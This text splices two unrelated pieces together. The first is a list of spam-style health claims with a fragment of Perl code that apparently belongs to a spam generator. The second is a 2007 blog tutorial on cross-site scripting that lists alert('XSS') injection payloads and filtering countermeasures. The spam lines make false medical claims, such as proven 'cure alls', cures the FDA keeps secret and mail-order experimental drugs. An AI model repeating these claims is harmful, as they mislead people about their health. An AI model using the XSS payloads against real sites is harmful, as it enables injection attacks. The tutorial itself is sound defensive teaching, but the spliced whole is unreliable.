THOUSANDS OF SATISFIED CUSTOMERS CANNOT BE WRONG
Get What Is Perhaps The Most Powerful Aphrodisiac Ever Discovered
Get More Energy And Explode Your Sex Life
Drop Those Extra Pounds And Feel Like A Teenager Again
Turn Your Life Around With Herbal Medicine
Get Back In Control Of Your Life
Consult With A Herbal Professional Today
Get some of our HUNZA DIET BREAD it is said to beat all fad diets hands down
IF YOU’VE BEEN LOOKING FOR THE MIRACLE FOR LOSING WEIGHT WITH NO HUNGER    THEN READ ON
These are all TOTALLY Natural with no negative side effects
WE ARE BLOWING THE PHARMACY GUIDE OUT DURING THIS SPECIAL
Get all the EXPERIMENTAL DRUGS you need here
Order from us and we can even send your presecriptions in by mail
We have put together THE COMPLETE PHARMACY GUIDE of MEXICO to help you save BIG MONEY on drugs
The Information we have obtained may be Your First Step towards a better tomorrow
If you do not have health insurance you are paying extremely high prices for your medications
With our services you do not need to leave the privacy and comfort of your home
GO TO OUR WEBSITE NOW AND JOIN OUR CLUB
You can order EVERYTHING online from us
Lose weight and inches without stimulants using our products
Lower cholesterol without drugs with our products
Control acne without antibiotics with our all NATURAL herbal remedies
You Should Use Our Herbal V Which is An Incredible All Natural Natural Alternative to Viagra
Welcome to the New Sexual Revolution
We Use ONLY The Highest Quality Pharmaceutical Grade Pure Nutriceuticals
With The Herbs We Sell You Can Be a Real Man Again
These amazing formulas first became popular with Hollywood insiders and the wealthy elite
Simply put these can make your sex life INCREDIBLE
According to clinical trials our products really are CURE ALLS
These cures are so wonderful the FDA is keeping them SECRET
You simply have to learn the PLEASURES of these herbs which THEY do not want you to know
END_CURES

foreach $line (@tospam) {    # Collapse whitespace to help matching.
s/^\s+//;
s/\s+$//;
s/\s+/ /g;
warn “Erroneous punctuation (! or .) found in cure all spam.” if m/[!.]/;
}

return;
}

# Just in case someone adds new genres too & is forgetful :]
warn “Error: invalid call to get_spamtype($needs)”;
}

Cross Site Scripting – The Technical Details

March 3, 2007

Cross Site Scripting: The Technical Details
===========================================

By snooq <jinyean@hotmail.com>

After one and a half month past my public presentation on the topic, i have gathered some feedback. Generaly, I feel that I have failed to address the issue in more details. Therefore, I have decided to write a article to follow up the issue to benefit those that are really
keen on knowing the ‘dirty’ stuffs.

I. Brief Introduction
II. Common Techniques of Code Injection
III. Countermeasure
IV. Conclusion
V. Glossary
VI. References

I. Brief Introduction

This article attempts to explain the anatomy of Cross Site Scripting holes.
While XSS may show up in many places in a web application, I will only focus
on one subset of the XSS issue – malicious code injection, particularly,
Javascript injection. Generally, the same concepts are also applicable to other
scripting languages like VBScript, JScript and so on.

The readers are assumed to have some knowledge of Cross Site Scripting bugs.
A little knowledge of HTML, CSS and JavaScript is helpful in understanding
the issue.

I feel that XSS issue is often overlooked or not correctly taken care of.
This seemingly trivial hole is a far more complex problem to solve than what
I had imagined it to be. It is my intention to tell you how the typical
XSS holes manifest themselves. Hopefully, you will be able to defend yourself,
build better web application or at the very least, to evaluate your risk better.

II. Common Techniques of Code Injection

Many web applications today are rather interactive. Very often, many parts of
the web site are under our manipulation. For example, a forum, a web messaging
system and so on. In these applications, users can post messages and most of the
time, users are allowed to post message with HTML tags for formatting. Now, all
these nice ‘features’ opens up oppoturnities for the attackers to inject malicious
code into the web sites if the web applications were poorly written.

As far as I know, these are several categories of code injection techniques:
(if you know of any techniques not listed here, please tell me)

1) Script Tags
==============

<script>alert(‘XSS’)</script>

Variations:

-> %3Cscript%3Ealert(‘XSS’)%3C/script%3E
-> <script>alert(‘XSS’)</script>
-> and so on…

2) Inline Code – Javascript pseudo-protocol
===========================================

<img src=”javascript:alert(‘XSS’)”>

Variations:

-> <img src=”javascript:alert(‘XSS’)”>
-> and so on…

3) Event Handler
================

<href src=”xxx” onmouseover=”javascript:alert(‘XSS’)>

Variations:

-> <href src=”xxx” onmouseover=”javascript:alert(‘XSS’)>
-> and so on…

4) The Cascading Style Sheet Way
================================

<br style=”background-image:url(javascript:alert(‘XSS’));”>

Variations:

-> <br style=”background-image:url(javascript:alert(‘XSS’));”>

5) Expression Evaluation in CSS
===============================

<br done=”false” style=”word-spacing:expression(!(eval(this.done))?alert(‘XSS’):0);
word-wrap:expression(this.done=true);)”>

Notes: 1) to 3) work on most browsers but 4) and 5) work on IE browsers only.

As you can see by now, it is not quite viable to list every possible variations of injection
techniques. Likewise, it is also not very viable to filter Javascript in HTML tags by hardcoded
rules.

III. Countermeasure

Looking at the 5 categories of techniques, let us go through them one at a time and see what
can be done to stop such attack. As I am not a professional programmer, countermeasure that
I put forward here are solely for reference only.

1) Script Tags
==============

This is the easiest to tackle. A simple translation rule that translates “<” to “&lt;”
, “>” to “&gt;” will do the job pretty well.

2) Inline Code – Javascript pseudo-protocol
===========================================

Again, this is also relatively easy to filter. A proposed countermeasure will be:

-> search for pattern ‘javascript’ and its variations like ‘javascript’
-> replace the pattern found with other harmless string
-> or just simply delete it

3) Event Handler
================

Things are getting tougher for the programmers now. For every HTML tags that are allowed
in the message, we have to search for all possible event handlers and defang them.

For instance, search for string “onmouseover” and replace with “” or other harmless string.

4) The Cascading Style Sheet Way
================================

This one is really a pain in the ass. I would suggest you to look at the CSS specifications
for a complete picture of the problem. Anyway, a suggestion (not tested though) will be:

-> be really paranoid and disallow CSS in tags totally
-> this means that we have to search for ‘style’s and defang them
-> or we may also try search for pattern ‘javascript’ and its variations like ‘javascript’
and replace them with harmless string

5) Expression Evaluation in CSS
===============================

Here comes, finally, an ultimate test for the programmers. Maybe, the safest way to deal with this
one is to disallow CSS completely by filtering ‘style’.

By now, we should realise that our defense against XSS problem is a very clumsy one. As there are
just too many items to check for in our list, many programmers often overlook some of them, especially
XSS of type 4 and 5.

IV. Conclusion

At the time of writing, I am not aware of any one-size-fit-all solution that will painlessly eradicate
XSS problems. And I believe, such solution may not materialise at all in the near future. Thankfully,
we have yet to see mass exploitation of XSS holes in the wild that causes significant financial loss.
But, before it happens to us, we have to be extra cautious when building web applications.

V. Glossary

XSS    Cross Site Scripting
CSS    Cascading Style Sheet

VI. References

1) http://www.w3.org/TR/REC-CSS1
2) http://www.idefense.com/XSS.html
3) http://www.cgisecurity.com/articles/xss-faq.shtml

-=snooq=-


Follow

Get every new post delivered to your Inbox.